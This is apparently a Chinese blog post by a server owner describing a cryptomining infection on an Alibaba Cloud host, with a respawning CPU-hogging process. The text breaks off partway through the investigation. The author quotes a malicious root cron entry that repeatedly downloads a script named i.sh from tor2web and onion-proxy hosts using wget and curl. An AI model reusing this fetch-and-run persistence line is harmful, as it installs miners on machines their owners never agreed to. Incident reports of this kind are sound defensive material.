之前在9月份的时候,我的阿里云服务器出现过一次被挖矿的情况,也是cpu爆满,后来发现是因为mysql的漏洞。
当时抓着mysql一顿处理,新建用户,强密码,设权限,nologin,可算是正常了。
这几天又再次出现了被挖矿的情况,今天算是解决了,舒服,下面说下情况。
表现:服务器上的web应用一场的慢,ssh登陆进去top -c查看如下:
COMMAN处的[UWcUml]占用cpu100%
每次Kill掉它之后,不超过1分钟,会再次出现一个类似的进程,继续爆破cpu。在/var/spool/cron下面发现一个root文件,是定时任务,内容是:
22 * * * * (wget -qU- -O- https://ddgsdk6oou6znsdn.tor2web.io/i.sh || curl -sA- https://ddgsdk6oou6znsdn.tor2web.io/i.sh || wget -qU- -O- ddgsdk6oou6znsdn.onion.in.net/i.sh || curl -sA- ddgsdk6oou6znsdn.onion.in.net/i.sh || wget -qU- -O- ddgsdk6oou6znsdn.tor2web.info/i.sh || curl -sA- ddgsdk6oou6znsdn.tor2web.info/i.sh ||